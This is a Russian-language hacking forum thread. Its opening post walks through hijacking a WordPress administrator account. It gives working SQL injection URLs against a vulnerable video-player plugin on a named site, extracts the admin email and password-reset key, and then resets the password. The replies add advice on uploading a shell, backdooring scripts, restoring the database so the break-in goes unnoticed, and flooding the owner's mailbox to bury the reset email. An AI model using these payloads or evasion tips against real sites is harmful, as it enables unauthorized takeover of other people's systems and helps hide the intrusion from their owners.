 |
|
07.11.2012, 16:56
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
Но я понял как входить в панель без ожидания расшифровки хэша.
Покажу на примере.
У нас есть блог, где мы уже вывели данные из таблицы wp_users.
Торопится выводить пароль не стоит, выведем e-mail администратора:
Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
И результат запроса:
Сообщение от None
admin:hackingmaster94@gmail.com
Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).
Вводим e-mail администратора который мы получили выше, и отправляем письмо.
Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
Делаем такой запрос:
Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
И в результате мы получаем активационный код:
Сообщение от None
P6rd7g1bPW28zgbPCRtZ
Теперь идем на страницу сброса пароля (При этом заполнив параметры):
Код:
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.
Далее привычная авторизация.
Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().
Способ работает не везде.
(с) MaxFast |
|
|
07.11.2012, 17:06
|
|
Познающий
Регистрация: 22.10.2009
Сообщений: 72
С нами:
8712183
Репутация:
24
|
|
Аммм...сорри ТС а для какой версии WP?
И как получить хэш для версии 3.4.1
|
|
|
|
07.11.2012, 17:10
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от cLauZ
Аммм...сорри ТС а для какой версии WP?
И как получить хэш для версии 3.4.1
Ну я тестировал на 3.2.1.
Все данные я вытянул с помощью SQL Injection в плагине.
|
|
|
|
07.11.2012, 17:32
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от cLauZ
Аммм...сорри ТС а для какой версии WP?
работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..
|
|
|
|
07.11.2012, 17:45
|
|
Новичок
Регистрация: 29.01.2010
Сообщений: 0
С нами:
8569461
Репутация:
0
|
|
ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?
|
|
|
|
07.11.2012, 17:47
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от martmm
ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?
Пароль знать не нужно, да.
Главное узнать e-mail, и активационный код.
|
|
|
|
07.11.2012, 18:09
|
|
Новичок
Регистрация: 10.08.2012
Сообщений: 13
С нами:
7239926
Репутация:
0
|
|
Сообщение от Prosta4ok
работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..
если шел зальешь, базу можно будет вернуть в исходное состояние.
|
|
|
|
07.11.2012, 18:13
|
|
Участник форума
Регистрация: 24.10.2006
Сообщений: 261
С нами:
10288451
Репутация:
174
|
|
Сообщение от Alexey_S
если шел зальешь, базу можно будет вернуть в исходное состояние.
И удалить письмо с восстановлением пароля с почты владельца?
|
|
|
|
07.11.2012, 18:22
|
|
Новичок
Регистрация: 10.08.2012
Сообщений: 13
С нами:
7239926
Репутация:
0
|
|
Сообщение от Serafim
И удалить письмо с восстановлением пароля с почты владельца?
Он может его и не прочитать, как повезет.Но если оставить как написано в первом посте, факт обнаружения выше.
|
|
|
|
07.11.2012, 19:01
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит)
А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
